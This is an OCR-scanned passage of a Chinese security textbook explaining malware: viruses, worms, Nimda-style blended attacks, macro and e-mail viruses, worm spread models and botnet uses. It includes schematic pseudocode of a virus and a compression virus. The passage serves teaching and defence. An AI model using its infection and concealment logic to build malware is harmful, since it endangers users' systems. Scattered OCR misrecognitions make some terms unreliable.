特洛伊 灭亡 ， 其 人 民 遭 受 死亡 和 奴役 。 
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执行 。 移 动 代码 通常 作为 病毒 、 蠕 虫 或 特洛伊 木马 传递 到 用 户 工作 站 的 机 制 。 在 其 他 情况 下 , 移 
动 代码 利用 漏洞 来 执行 其 自身 ， 例 如 未 授权 的 数据 访问 或 root 威胁 。 流 行 的 移动 代码 传递 媒介 
包括 Java applet, ActiveX, JavaScript 及 VBScript。 在 本 地 系统 上 使 用 移动 代码 进行 恶意 操作 的 
最 普遍 的 方式 包括 跨 站 脚本 攻击 、 交 互 和 动态 网 站 、E-mail 附件 以 及 从 不 可 信 站 点 或 由 不 可 信 软 
件 进行 的 下 载 。 


14.45 ”多 威胁 恶意 软件 


病毒 及 其 他 恶意 软件 都 可 能 以 多 种 方式 执行 , 因此 术语 上 难以 统一 。 本 节 对 一 些 多 威胁 恶意 
软件 的 相关 概念 进行 简要 介绍 。 
多 元 复合 型 ( multipartite ) 病毒 以 多 种 方式 进行 感染 。 典 型 地 讲 ， 多 元 复合 型 病毒 可 以 感染 
多 种 类 型 的 文件 ， 因 此 对 这 种 病毒 进行 根除 就 必须 处 理 所 有 可 能 的 感染 点 。 
混合 攻击 (blended attack ) 使 用 多 种 感染 或 传播 方法 来 最 大 化 感染 速度 和 攻击 严重 性 。 一 
些 作者 将 混合 攻击 描述 为 一 个 包含 多 种 恶意 软件 的 程序 包 。 混合 攻击 的 一 个 例子 是 Nimda Kit, 
它 常 被 错误 地 认为 是 简单 的 蠕虫 。Nimda 使 用 四 种 分 发 方法 : 
e E-mail: 漏洞 主机 上 的 用 户 打开 一 个 被 感染 的 E-mail 附件 。Nimda 在 主机 上 寻找 E-mail 
地 址 并 向 这 些 地址 发 送 其 自身 的 拷贝 。 
@ Windows 共享 文件 : Nimda 扫描 主机 ， 寻 找 不 安全 的 Windows 共享 文件 ， 然 后 使 用 
NetBIOS86 作为 传输 机 制 来 感染 该 文件 ， 希 望 用 户 运行 被 感染 文件 ， 这 样 会 激活 主机 上 
的 Nimda。 
@ Web 服务 器 : Nimda 扫描 Web 服务 器 ， 寻找 Microsoft HS 的 已 知 漏洞 ， 如 果 找 到 了 有 漏 
洞 的 服务 器 ， 就 尝试 向 该 服务 器 传递 自身 的 一 个 拷贝 并 感染 服务 器 及 其 上 的 文件 。 
@ Web 客户 端 : 若 有 漏洞 的 Web 客户 端 访问 了 被 Nimda 感染 的 Web 服务 器 ， 客 户 端 工作 
站 将 被 感染 。 
因此 ，Nimda 兼 具 里 虫 、 病 毒 和 移动 代码 的 特性 。 混 合 攻击 可 以 通过 诸如 即时 消息 和 P2P 
文件 共享 等 其 他 服务 进行 传播 。 


R144 .恶意 程序 相关 术语 


名 称 描 述 
一 种 恶意 软件 , 被 执行 时 会 尝试 向 其 他 可 执行 代码 中 复制 其 自身 , 这 一 步 成 功 后 的 可 执行 代 











ne 码 称 为 被 感染 ， 当 被 感染 的 代码 执行 时 ， 病 毒 也 会 被 执行 

蠕虫 一 个 可 独立 运行 的 计算 机 程序 ， 可 以 向 网 络 中 的 其 他 主机 传播 它 自身 的 一 个 完整 运行 版 本 

逻辑 炸弹 被 人 侵 者 插入 软件 中 的 程序 ,该 程序 处 于 睡眠 状态 直到 一 个 预定 义 的 条 件 被 满足 然后 程序 
触发 一 些 未 授权 的 行为 

特洛伊 本 马 一 种 表现 出 有 用 功能 的 计算 机 程序 , 包含 隐藏 的 潜在 恶意 功能 来 规避 安全 机 制 ， 有 时 利用 对 


调用 该 特洛伊 木马 程序 的 系统 实体 的 合法 授权 来 进行 规避 
后 门 任何 绕 过 正常 安全 检查 的 机 制 ， 允 许 对 功能 进行 非 授 权 访 问 


可 以 不 加 更 改 地 装载 到 不 同 种 类 的 平台 且 以 相同 的 语义 执行 的 软件 ( 如 脚本 、 宏 或 其 他 便携 
移动 代码 指令 ) 
日 














Exploits 特定 于 一 个 或 一 类 漏洞 的 代码 

下 载 器 向 正 被 攻击 的 主机 安装 其 他 恶意 软件 的 程序 ， 通 常 通过 E-mail 传播 
Auto-rooter 用 来 远程 进入 新 主机 的 恶意 黑客 工具 

Kit ( 病毒 生成 器 ) 自动 生成 新 病毒 的 工具 集合 

垃圾 邮件 程序 用 来 发 送 大 量 无 用 E-mail 


洪 泛 攻击 者 用 大 量 通信 对 网 络 计算 机 系统 实施 拒绝 服务 攻击 〈《Dos ) 
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( 续 ) 
名 称 描 述 
Keyloggers 捕获 系统 中 的 击 键 信息 
Rootkit 在 攻击 者 已 侵入 计算 机 系统 旦 获得 root 访问 权限 后 使 用 的 骇 客 工 具 集 合 
Zombie, F 在 被 感染 主机 上 处 于 激活 状态 的 向 其 他 主机 发 起 攻击 的 程序 
间谍 软件 从 计算 机 中 收集 信息 并 传递 给 其 他 系统 的 软件 
广告 软件 软件 中 集成 的 广告 ， 可 导致 弹出 广告 或 将 浏览 器 重 定向 到 一 个 商业 网 站 
14.5 病毒、 蠕虫 与 僵尸 
14.5.1 病毒 


计算 机 病毒 是 通过 算 改 来 感染 其 他 程序 的 软件 ,修改 方式 通常 为 向 原 程序 中 注入 例 程 以 备份 
病毒 程序 ， 该 程序 随后 将 继续 感染 其 他 程序 。 

生物 学 中 的 病毒 是 一 小 片 遗传 密码 (DNA R RNA ) 以 控制 活 细胞 的 生理 活动 来 产生 成 千 上 
万 个 原 病毒 的 完美 的 复制 品 。 与 生物 学 意义 相似 的 是 , 计算 机 病毒 携带 的 代码 将 指导 如 何 完美 地 
复制 它 自身 。 典 型 的 病毒 首先 炭 人 计算 机 中 的 某 个 程序 , 随后 ， 当 被 感染 的 计算 机 运行 未 被 感染 
的 软件 时 , 病毒 产生 新 的 拷贝 并 入 侵 新 的 程序 , 这 样 , 通过 毫 无 戒心 的 用 户 之 间 交 换 磁盘 或 通过 
网 络 共享 程序 , 病毒 在 计算 机 之 间 不 断 扩散 。 在 联网 环境 中 , 一 台 计 算 机 可 以 访问 其 他 计算 机 上 
的 应 用 程序 和 系统 设备 的 能 力 给 病毒 的 传播 提供 了 理想 的 温床 。 


病毒 的 基本 特征 
其 他 程序 可 以 做 的 任何 事情 病毒 都 能 做 ,唯一 的 区 别 在 于 病毒 依附 在 其 他 程序 上 并 且 在 宿主 
程序 运行 时 秘密 地 运行 。 当 病毒 运行 时 , 它 可 以 执行 当前 用 户 授予 给 宿主 的 权限 允许 的 任何 操作 , 
如 清除 文件 或 程序 等 。 
一 个 计算 机 病毒 包括 三 部 分 [AYCO06]: 
© 感染 策略 : 病毒 扩散 和 复制 自身 的 途径 。 该 策略 也 称 为 感染 媒介 。 
o 触发 器 : 决定 何 时 有 效 载荷 被 激活 或 发 送 的 事件 或 环境 。 
e 有 效 载荷 :病毒 所 进行 的 除 传播 以 外 的 活动 。 有 效 载 荷 可 能 造成 损害 ， 也 可 能 引起 无 害 
的 但 明显 的 活动 。 
在 一 个 完整 的 生命 周期 内 ， 一 个 典型 的 病毒 经 历 以 下 四 个 阶段 : 
@ 潜伏 阶段 : 病毒 是 闲置 的 。 病 毒 最 终 会 被 某 些 事件 激活 ， 如 某 个 日 期 、 另 一 程序 或 文件 
的 存在 或 是 磁盘 容量 到 达 某 一 限额 。 不 是 所 有 的 病毒 都 有 这 一 阶段 。 
o 传播 阶段 : 病毒 将 它 的 同一 拷贝 放 进 其 他 程序 或 磁盘 上 的 某 些 系统 区 域 。 每 个 感染 的 程 
序 都 会 包含 病毒 的 一 个 复制 品 ， 它 也 会 进入 传播 阶段 。 
@ 触发 阶段 病毒 被 激活 以 执行 它 预期 的 功能 。 如 潜伏 阶段 一 样 ， 触 发 阶段 可 以 被 多 种 系 
统 事件 引起 ， 包 括 病毒 的 这 份 拷贝 已 经 将 自己 复制 了 一 定 的 次 数 等 。 
o 执行 阶段 : 病毒 开始 执行 它 的 功能 。 其 功能 可 能 是 无 害 的 (如 在 屏幕 上 显示 一 条 信息 ) 
或 具有 破坏 性 的 〈 如 破坏 程序 和 数据 文件 )。 
多 数 病毒 针对 某 一 特定 的 操作 系统 完成 它们 的 工作 , 在 某 些 情况 下 , 甚至 针对 特定 的 硬件 平 
台 ， 因 此 ， 它 们 被 设计 为 利用 特定 的 系统 的 弱点 实施 攻击 。 
病毒 的 结构 
病毒 可 以 被 附加 在 可 执行 程序 的 头 部 或 尾部 , 也 可 以 以 其 他 方式 嵌入 。 病毒 活动 的 关键 是 当 
被 感染 的 程序 被 唤醒 时 ， 首 先 执行 病毒 代码 ， 然 后 执行 程序 的 原 代码 。 
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图 14.3 展示 了 一 段 对 病毒 结构 的 大 致 描述 ( 基于 [COHE94] )。 在 本 例 中 ， 病 毒 代 码 V 预谋 
感染 程序 ， 假 定 当 它 被 唤醒 时 ， 程 序 的 进入 点 为 程序 的 第 一 行 。 


Program V := 


{goto main; 
1234567; 


subroutine infect~executable := 


file := get-random-executable-file; 
if (first-line-of-file = 1234567) 


then goto loop 
else prepend V to file; } 


subroutine do-damage := 
{whatever damage is to be done} 


subroutine trigger-pulled := 
{return true if some condition holds} 


main: main-program := 
{infect-executable; 
if trigger-pulled then do-damage; 
goto next;} 





图 14.3 一 个 病毒 的 例子 


被 感染 的 程序 以 病毒 代码 开头 , 随后 正常 工作 。 代码 的 第 一 行 即 跳 转 到 病毒 主 程序 , 第 二 行 
是 一 个 特殊 标记 , 病毒 用 它 来 鉴别 潜在 的 受害 程序 是 否 已 被 这 种 病毒 感染 过 。 当 程序 被 唤醒 , 控 
制 语 句 立 即 转 到 病毒 主 程序 。 病 毒 程 序 可 以 首先 找 出 未 被 感染 的 可 执行 文件 并 感染 它们 , 随后 病 
毒 可 能 执行 某 些 操作 , 通常 对 系统 不 利 , 这 些 操 作 可 以 在 每 次 程序 被 唤醒 时 实施 , 也 可 以 是 只 在 
某 些 特定 情况 下 触发 的 逻辑 炸弹 。 最 终 ,病毒 传送 控制 权 给 原 程序 。 如 果 病 毒 感 染 程序 的 阶段 较 
快 ， 用 户 不 容易 注意 到 被 感染 的 与 未 被 感染 的 程序 之 间 存 在 任何 不 同 。 

类 似 上 文 介 绍 的 病毒 极 易 被 发 现 , 因为 被 感染 的 程序 比 对 应 的 未 感染 的 程序 更 长 。 阻挠 这 一 
简单 鉴别 方法 的 一 种 方法 是 压缩 可 执行 文件 ， 使 得 感染 的 版 本 与 未 感染 的 版 本 具有 相同 的 长 度 。 
图 14.4[COHE94] 大 体 上 展示 了 所 需 的 逻辑 。 这 一 病毒 中 重要 的 行 已 经 被 编号 。 我 们 假设 程序 P, 
被 病毒 CV 感染 ， 当 此 程序 被 唤醒 后 ， 控 制 权 传送 给 病毒 ， 然 后 实施 以 下 步骤 : 

1) 对 于 发 现 的 每 个 未 被 感染 的 P: ， 病 毒 首先 压缩 该 文件 以 产生 P',， 使 它 的 大 小 比 原 程序 

H, EPRS P 相差 的 大 小 为 病毒 的 大 小 。 

2) 病毒 的 一 个 拷贝 被 放置 在 压缩 后 的 程序 的 头 部 。 

3 ) 被 感染 的 程序 的 压缩 版 本 P' 被 解压 缩 。 

4) 执行 解压 缩 后 的 原 程序 。 


program CV := 


{goto main; 
01234567; 


subroutine infect-executable := 
file := get-random-executable-file; 


if (first-line-of-file = 01234567) then goto loop; 
) compress file; 


prepend Cv to file; 


main-program := 
{if ask-permission then infect-executable; 
(3) uncompress rest-of-file; 
(4) run uncompressed file;} 
} 





图 14.4 一 个 压缩 病毒 的 例子 
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在 这 个 例子 中 , 病毒 除 传播 以 外 没有 任何 其 他 操作 。 如 前 文 所 述 , 这 个 病毒 可 能 包含 一 个 膛 
辑 炸 弹 。 

一 旦 病毒 以 感染 某 一 程序 的 方式 进入 系统 , 它 就 有 可 能 在 宿主 被 执行 后 感染 系统 中 的 部 分 其 
至 全 部 可 执行 文件 。 因此, 要 完全 避免 计算 机 感染 病毒 ,就 要 从 一 开始 阻止 病毒 进入 系统 。 不幸 
的 是 , 由 于 病毒 可 以 是 系统 外 任意 程序 的 一 部 分 , 因此 完全 预防 病毒 人 侵 是 相当 困难 的 , 除非 从 
头 开始 写 自己 的 操作 系统 及 应 用 程序 ,否则 计算 机 就 是 脆弱 的 。 通过 禁止 普通 用 户 修改 系统 中 的 
程序 可 以 阻止 多 种 形式 的 感染 。 

基于 传统 机 器 码 的 病毒 之 所 以 能 在 这 些 系统 上 快速 传播 的 主要 原因 是 早期 的 PC 机 缺乏 访问 
控制 。 相 比 之 下 ,虽然 制造 针对 UNIX 系统 的 机 器 码 病毒 非常 简单 , 但 是 它们 在 实践 中 从 未 大 规 
模 流行 过 , 这 是 因为 操作 系统 中 的 访问 控制 机 制 阻止 了 病毒 的 有 效 传播 。 基 于 传统 机 器 码 的 病毒 
现在 不 再 像 以 前 那样 流行 了 , 这 也 是 因为 现代 的 PC 操作 系统 有 了 更 有 效 的 访问 控制 机 制 。 但 是 ， 
病毒 的 制造 者 发 现 了 其 他 的 传播 渠道 ， 例 如 宏和 电子 邮件 病毒 ， 随 后 将 讨论 这 些 问题 。 
病毒 分 类 

自从 病毒 首次 出 现 , 病毒 制造 者 与 反 病 毒 软件 专家 之 间 就 一 直 在 进行 军备 竞赛 。 尽管 针对 已 
有 病毒 的 有 效 对 策 总 是 能 够 制定 出 来 , 但 新 的 病毒 还 在 源源 不 断 地 出 现 。 目前 并 没有 针对 病毒 的 
简单 而 被 普遍 接受 的 分 类 方案 ， 在 本 节 我 们 遵照 [AYCO06] 并 将 病毒 按 两 条 正 交 的 特征 分 类 : 病 
毒 试图 感染 的 目标 类 型 和 病毒 用 以 隐藏 自己 从 而 不 被 用 户 和 反 病 毒 软件 发 现 的 方法 。 

根据 病毒 的 目标 ， 病 毒 可 以 分 为 以 下 几 类 : 

o 引导 扇 区 型 感染 : 感染 主 引导 记录 或 引导 记录 ， 当 系统 由 包含 该 病毒 的 磁盘 启动 时 病毒 

传播 。 

@ 文件 型 感染 : 感染 操作 系统 或 过 〈 shell ) 认为 的 可 执行 文件 。 

© 宏 病毒 : 感染 包含 宏 代 码 的 文件 ， 宏 代码 将 被 其 他 应 用 程序 解释 。 

根据 隐藏 策略 ， 病 毒 可 以 分 为 以 下 几 类 : 

@ 加 密 病毒 : 典型 的 处 理 方式 一 一 病毒 的 一 部 分 生成 随机 加 密 密 钥 并 加 密 病毒 剩余 的 部 分 ， 

密 钥 与 病毒 存放 在 一 起 。 当 被 感染 的 程序 被 唤醒 时 ， 病 毒 使 用 保存 下 来 的 随机 密 钥 解密 
病毒 。 当 病毒 复制 时 ， 将 选择 一 个 不 同 的 随机 密 钥 。 由 于 病毒 的 主要 部 分 每 次 都 用 不 同 
的 密 钥 加 密 ， 因 此 观察 不 到 固定 的 位 组 合 模式 。 

o 隐形 病毒 : 这 种 病毒 的 设计 目标 是 让 反 病 毒 软件 无 法 发 现 它 们 ， 因 此 ， 不 只 有 效 载荷 ， 

整个 病毒 都 是 隐藏 的 。 

© 多 态 病毒 : 病毒 的 每 次 感染 都 会 变异 ， 因 此 不 太 可 能 发 现 这 种 病毒 的 “签名 ”。 

© 变形 病毒 : 与 多 态 病 毒 类 似 ， 变 形 病 毒 每 次 感染 时 都 会 变异 。 不 同 之 处 在 于 变形 病毒 每 

次 都 完全 重 写 它 自身 ， 这 使 得 发 现 该 病毒 的 难度 大 大 增加 。 变 形 病毒 不 仅 改 变 它 们 的 外 
观 ， 还 会 改变 它们 的 行为 。 

前 面 已 经 讨论 了 一 个 隐形 病毒 的 例子 :该 病毒 利用 压缩 使 得 被 感染 的 程序 与 未 被 感染 的 程序 
长 度 完 全 相同 。 也 出 现 了 更 高 级 的 技术 , 例如 , 有 一 种 病毒 可 以 在 磁盘 IO 序列 中 放 人 中断 逻辑 ， 
使 得 当 用 户 或 反 病 毒 软件 试图 使 用 这 些 程序 读 取 磁盘 中 的 可 疑 部 分 时 ,病毒 会 提供 原来 的 未 被 感 
染 的 程序 ， 于是， 隐形 不 是 指 病毒 自身 ， 而 是 指 病毒 使 用 了 某 种 技术 以 避免 被 发 现 。 

多 态 病毒 在 复制 时 创建 功能 上 等 价 但 具有 明显 不 同 的 位 组 合 模式 的 拷贝 , 这 种 情况 下 , 病毒 
的 “签名 ” 随 拷 贝 而 变化 。 为 了 达到 这 种 变异 效果 ,病毒 可 能 随机 插入 元 余 指 令 或 交换 彼此 独立 
的 指令 的 次 序 ,而 更 有 效 的 方法 是 加 密 。 加 密 病毒 的 策略 如 下 所 述 : 病毒 的 一 部 分 负责 生成 密 钥 
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和 进行 加 密 /解密 ， 这 部 分 称 做 变异 机 ， 应 用 于 不 同 用 途 的 变异 机 各 不 相同 。 
病毒 套件 

病毒 制造 者 的 另 一 个 武器 是 病毒 制造 工具 包 , 这 样 的 工具 包 使 得 一 个 初学 者 能 够 快速 制造 大 
基 不 同 的 病毒 。 虽 然 由 工具 包 制 造 的 病毒 一 般 不 如 从 零 开 始 制造 的 病毒 精密 , 但 使 用 病毒 套件 可 
以 轻易 地 创造 的 大 量 新 病毒 仍然 给 反 病 毒 策略 制造 了 难题 。 


宏 病毒 
在 20 世纪 90 年 代 中 期 ,， 宏 病毒 成 为 了 最 流行 的 病毒 。 由 于 以 下 原因 , 宏 病毒 比 传统 病毒 更 
加 危险 : i 
1) 宏 病 毒 是 跨 平台 的 。 许 多 宏 病 毒 感染 Word 文档 或 其 他 Office 文件 ， 任 何 支 持 这 些 应 用 
的 硬件 平台 或 操作 系统 都 可 能 被 感染 。 
2) 宏 病 毒 感染 文档 而 不 是 代码 的 可 执行 部 分 ， 而 计算 机 系统 中 存 人 的 大 部 分 信息 是 以 文档 
形式 保存 的 。 
3 ) 宏 病毒 更 容易 传播 ， 一 个 非常 通用 的 方法 即 为 通过 电子 邮件 传播 。 
4) 让 于 宏 病 毒 感染 用 户 的 文档 而 不 是 系统 程序 ， 传 统 的 文件 系统 访问 控制 机 制 在 阻止 它们 
的 传播 方面 作用 有 限 。 
宏 病 毒 利 用 Word 和 其 他 Office 应 用 ( 如 Excel) 的 特征 ， 即 所 谓 的 宏 ， 来 实施 攻击 。 从 本 
质 上 说 , 宏 是 一 个 租 信 字 处 理 文档 或 其 他 类 型 文件 的 可 执行 程序 。 一般 情况 下 ,用 户 使 用 宏 来 自 
动 重复 执行 任务 以 节省 击 刍 次数 。 宏 语言 经 常 是 Basic 语言 的 某 种 形式 ， 用 户 可 能 会 在 一 个 宏 中 
定义 一 串 击 键 操 作 并 建立 宏 以 使 得 当 输入 一 个 功能 键 或 几 个 键 的 组 合 时 宏 能 够 被 调用 。 
MS Office 的 后 续 版 本 提供 了 越 来 越 多 的 针对 宏 病 毒 的 保护 措施 ， 例 如 ， 微 软 提供 了 可 选择 
的 Macro Virus Protection 工具 以 发 现 可 疑 的 Word 文件 并 警告 用 户 在 打开 包含 宏 的 文件 时 可 能 存 
在 风险 ,许多 反 病 毒 产 品 供应 商 也 开发 了 检测 和 纠正 宏 病 毒 的 工具 。 如 同 在 其 他 类 型 的 病毒 上 发 
生 的 情况 一 样 , 在 宏 病 毒 领 域 展开 的 军备 竞赛 仍 在 继续 . 但 是 宏 病 毒 已 经 不 再 是 占 主导 地 位 的 病 
毒 威 胁 了 。 


电子 邮件 病毒 

电子 邮件 病毒 是 最 近 新 产生 的 恶意 软件 。 最 早 的 快速 传播 的 电子 邮件 病毒 ， 如 Melissa, 利用 
了 附件 中 其 入 的 MS Word 宏 指 令 。 如 果 接 收 者 打开 电子 邮件 的 附件 ，Word 宏 就 会 被 激活 ， 随 后 

1) 电子 邮件 病毒 将 它 自身 转发 给 用 户 邮 件 列 表 里 的 每 个 用 户 。 

2 ) 病毒 在 用 户 的 系统 中 进行 局 部 损害 。 

1999 年 ， 一 种 威力 更 大 的 电子 邮件 病毒 出 现 了 ， 这 种 新 版 本 的 病毒 在 打开 包含 病毒 的 电子 
邮件 时 就 能 够 被 激活 ， 而 不 是 在 打开 附件 时 才 被 激活 。 这 种 病毒 使 用 电子 邮件 包 支 持 的 Visual 
Basic 脚本 语言 。 

于 是 ,我 们 现在 看 到 了 一 种 新 的 通过 电子 邮件 发 生 并 利用 电子 邮件 软件 的 特点 在 因特网 上 复 
制 它 自身 的 恶意 软件 。 病 毒 在 它 被 激活 ( 打开 电子 邮件 附件 或 打开 电子 邮件 本 身 ) 的 瞬间 就 开始 
复制 自身 并 向 被 感染 的 主机 所 知 的 所 有 电子 邮件 地 址 发 送 拷贝 。 结 果 就 是 , 以 前 的 病毒 花费 几 个 
月 甚至 几 年 才能 完成 的 增殖 目标 , 现在 却 可 以 在 短 短 数 小 时 内 完成 , 这 使 得 反 病 毒 软 件 难以 在 大 
规模 的 破坏 被 造成 之 前 作出 回应 。 最终 ,因特网 应 用 中 必须 要 建立 起 更 高 程度 的 安全 级 别 , 同时 
个 人 计算 机 中 的 应 用 软件 也 要 对 不 断 增长 的 威胁 进行 反击 。 


14.5.2 蠕虫 
螨虫 是 复制 它 自身 并 通过 网 络 连接 在 计算 机 之 间 发 送 它 的 拷贝 的 程序 ,在 到 达 另 一 台 计 算 机 
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后 ,蠕虫 可 能 继续 复制 自身 并 繁殖 。 除 繁殖 之 外 ,蠕虫 通常 还 会 执行 一 些 多 余 的 操作 。 电 子 邮件 
病毒 也 包含 一 些 蠕虫 的 特征 ,例如 它 在 系统 与 系统 之 间 繁 殖 , 但 是 我 们 仍然 将 它 分 类 为 病毒 ， 因 
为 它 通过 修改 文档 来 包容 病毒 的 宏 内 容 而 且 有 赖 于 用 户 操作 。 蠕 虫 积 极地 寻找 更 多 的 机 器 来 感 
染 ， 每 个 被 感染 的 机 器 充当 一 个 攻击 其 他 机 器 的 自动 发 射 台 。 
网 络 蠕虫 程序 利用 网 络 连接 在 系统 之 间 传 播 。 当 在 一 个 系统 内 激活 后 , 网 络 蠕虫 可 能 表现 为 
计算 机 病毒 或 细菌 (bacteria ) ， 它 也 可 能 注 人 木马 程序 或 进行 其 他 分 裂 性 的 或 破坏 性 的 操作 。 
为 了 复制 它 自身 ， 网 络 蠕虫 使 用 多 种 网 络 传播 媒介 ， 例 如 以 下 几 种 : 
@ 电子 邮件 功能 : 蠕虫 以 电子 邮件 方式 发 送 它 自身 的 拷贝 给 其 他 系统 ，. 使 得 它 的 代码 在 电 
子 邮件 或 附件 被 接收 或 查看 时 运行 。 
© 远程 执行 功能 :蠕虫 使 用 远程 执行 功能 或 利用 网 络 服务 中 的 程序 缺陷 以 破坏 它 的 运转 ( 例 
如 缓冲 区 溢出 ， 如 第 7 章 所 述 ) ， 从 而 实现 在 另 一 个 系统 中 运行 它 的 拷贝 。 
© 远程 登录 功能 : 蠕虫 作为 一 个 用 户 登 录 到 一 个 远程 系统 上 ， 然 后 使 用 命令 行 从 一 个 系统 
将 它 自身 复制 到 另 一 个 系统 ， 然 后 它 在 该 系统 上 运行 。 
蠕虫 的 新 拷贝 在 远程 系统 上 运行 后 , 除 在 该 系统 上 发 挥 它 的 功能 外 , 它 还 以 相同 的 方式 继续 
传播 。 
网 络 蠕虫 与 计算 机 病毒 显示 出 相同 的 特征 : 潜伏 阶段 、 传 播 阶段 、 触 发 阶段 、 执 行 阶段 。 传 
播 阶 段 一 般 表现 为 如 下 功能 : 
1 ) 通过 检查 主机 列表 或 远程 系统 地 址 的 类 似 列表 来 搜索 其 他 系统 以 寻求 感染 目标 。 
2 ) 与 远程 系统 建立 连接 。 
3) 将 它 自 身 拷 贝 到 远程 系统 并 诱 使 拷贝 运行 。 
网 络 蠕虫 也 可 能 试图 在 将 它 自身 拷贝 到 系统 中 之 前 确定 一 个 系统 是 否 已 经 被 感染 ， 在 多 程序 
系统 中 , 它 也 可 能 通过 将 自己 命名 为 系统 进程 或 其 他 不 会 被 系统 操作 者 注意 到 的 名 字 来 隐藏 自身 。 
如 病毒 一 样 ， 网 络 蠕虫 很 难 防范 。 


蠕虫 传播 模型 

基于 对 最 近 的 蠕虫 攻击 的 分 析 ，[ZOU05] 描 述 了 蠕虫 传播 的 模型 。 传 播 速 度 和 被 感染 的 主机 
的 总 数 取决 于 许多 因素 , 包括 传播 模式 、 被 利用 的 弱点 以 及 与 以 前 的 攻击 的 相似 度 。 对 于 最 后 一 
个 因素 来 说 ， 一 个 以 前 的 攻击 的 变种 会 比 一 个 新 颖 的 攻击 得 到 更 有 效 的 对 抗 。 图 14.5 展示 了 一 
组 典型 的 参数 下 变化 的 情况 。 传 播 经 历 了 三 个 阶段 : 在 初始 阶段 ,主机 数量 成 指数 级 增长 ,为 了 
说 明 这 一 点 ， 仅 需 考 虑 一 个 简单 的 模型 ， 其 中 一 个 蠕虫 从 一 台 主 机 发 射 并 感染 两 台 相 邻 的 主机 ， 
接 下 来 ,每 台 这 样 的 主机 都 感染 两 台 其 他 主机 , 这样 继续 下 去 ,被 感染 的 主机 数量 呈现 出 指数 增 
长 。 一 段 时 间 后 ， 由 于 被 感染 的 主机 将 一 部 分 时 间 浪 费 在 感染 已 经 被 感染 过 的 主机 上 ,因此 传播 
速度 降低 了 ,在 这 一 中 间 阶 段 , 增长 是 近似 线性 的 , 但 是 感染 率 快速 上 升 。 当 大 多 数 脆弱 的 计算 
机 已 经 被 感染 后 ， 攻 击 进入 缓慢 的 最 后 阶段 ， 蠕 虫 发 现 剩 下 的 未 被 感染 的 主机 难以 被 攻击 。 

显然 ， 对抗 蠕虫 的 目标 是 在 蠕虫 的 慢 速 起 始 阶段 发 现 并 消灭 蠕虫 ， 此 时 只 有 少量 的 主机 被 
感染 。 


蠕虫 技术 的 现状 
蠕虫 技术 发 展 水 平 的 现状 如 下 所 述 : 
o HFE: 新 的 蠕虫 并 不 局 限于 Windows 平台 ,而 是 已 经 具备 了 攻击 多 种 平台 的 能 力 ， 特 
别 是 通用 的 UNIX 平台 。 
@ 多 渠道 ,新 的 蠕虫 利用 多 种 途径 人 侵 系 统 ， 可 能 被 利用 的 渠道 包括 : 网 络 服务 器 、 浏 览 
器 、 电 子 邮件 、 文 件 共享 以 及 其 他 基于 网 络 的 应 用 。 
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图 14.5 蠕虫 扩散 模型 


超 快 的 传播 : 一 种 加 速 蠕虫 传播 的 技术 是 通过 维护 一 个 较 早 的 因特网 扫描 来 收集 脆弱 的 
机 器 的 网 络 地 址 。 

多 态 : 为 躲避 侦查 ， 跳 过 过 滤器 ， 挫 败 实时 分 析 ， 蠕 虫 采纳 了 病毒 的 多 态 技术 。 蠕 虫 的 
每 份 拷贝 都 包含 利用 功能 等 价 的 指令 和 加 密 技术 快速 产生 的 新 代码 。 

变种 : 除 改变 它们 的 外 观 外 ， 变 种 蠕虫 在 传播 的 不 同 阶 段 表 现 出 不 同 的 行为 模式 。 
运输 载体 ， 由 于 蠕虫 能 够 迅速 攻破 大 量 系统 ,它们 是 理想 的 传播 其 他 分 布 式 攻击 工具 的 
载体 ， 例 如 分 布 式 拒 绝 服务 攻击 机 器 人 。 

零 日 漏洞 攻击 : 为 了 达到 最 大 限度 的 意外 性 和 扩散 性 ， 当 蠕虫 被 推出 时 ， 它 应 该 开发 仅 
被 网 络 社区 发 现 的 未 知 的 漏洞 。 


14.5.3 ”僵尸 


僵尸 也 称 做 机 器 人 或 寄生 虫 , 僵尸 程序 一 般 先 秘密 接管 另 一 台 可 以 连接 因特网 的 计算 机 , 随 
后 使 用 该 计算 机 实施 攻击 , 并 使 得 追踪 僵尸 的 制造 者 变 得 困难 。 僵尸 通常 栽赃 给 成 百 上 千 台 属于 
可 信任 的 第 三 方 计算 机 。 大 量 的 僵尸 经 常 能 够 协同 工作 ， 这 样 的 聚集 通常 称 做 僵尸 网 络 。 

僵尸 网 络 表现 出 三 个 特征 : 机 器 人 、 远 程控 制 以 及 繁 了 衍 僵 尸 并 构建 僵尸 网 络 的 扩散 机 制 。 我 
们 将 逐个 详 述 每 个 特征 。 
僵尸 的 应 用 

[HONE05] 列 出 了 僵尸 的 下 列 用 途 : 


分 布 式 拒绝 服务 攻击 : DDoS 攻击 是 对 计算 机 系统 或 网 络 进行 的 攻击 ， 目 的 是 使 用 户 得 
不 到 服务 。 

BABA: 在 僵尸 网 络 中 上 千 个 僵尸 的 帮助 下 ， 攻 击 者 可 以 发 送 大 量 的 垃圾 邮件 。 
监听 网 络 流量 : 僵尸 可 以 使 用 嗅 探 器 在 经 过 被 攻破 的 机 器 的 数据 包 中 寻找 感 兴趣 的 明文 
数据 。 嗅 探 器 多 用 来 检索 敏感 信息 ， 如 用 户 名 和 密码 。 

键盘 记录 : 如 果 被 攻破 的 机 器 使 用 加 密 信道 ( 如 HTTPS 或 POP3S ) , 那么 仅仅 监听 通过 
受害 者 计算 机 的 网 络 数据 包 是 无 用 的 ， 因 为 数据 包 的 解密 密 钥 是 未 知 的 。 但 是 通过 使 用 
键盘 记录 来 捕获 被 感染 的 计算 机 上 的 击 键 ， 攻 击 者 可 以 检索 敏感 信息 。 一 个 有 效 的 过 滤 
机 制 (例如 “我 只 对 关键 词 “paypal.com” 附 近 的 击 键 序列 感 兴趣 ”) 可 以 进一步 协助 
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盗窃 秘密 数据 。 

@ 散布 新 的 恶意 软件 : HMA MAA HTTP 或 FTP 下 载 并 执行 文件 的 机 制 ， 
因此 僵尸 网 络 极 易 被 用 于 散布 新 的 恶意 软件 。 如 果 一 个 拥有 10000 台 主 机 的 价 尸 网 络 担 
当 某 个 蠕虫 或 电子 邮件 病毒 的 发 起 者 ， 那 么 病毒 或 蠕虫 的 传播 将 非常 迅速 ， 从 而 造成 更 
大 的 伤害 。 

@ 安装 广告 插件 和 浏览 器 辅助 对 象 (BHO) : 僵尸 网 络 可 以 用 于 获取 商业 利益 ， 这 可 以 通 
过 建立 一 个 虚假 的 带 广告 的 网 站 达成 一 一 网 站 的 管理 员 与 一 些 集团 公司 达成 协议 ， 公 司 
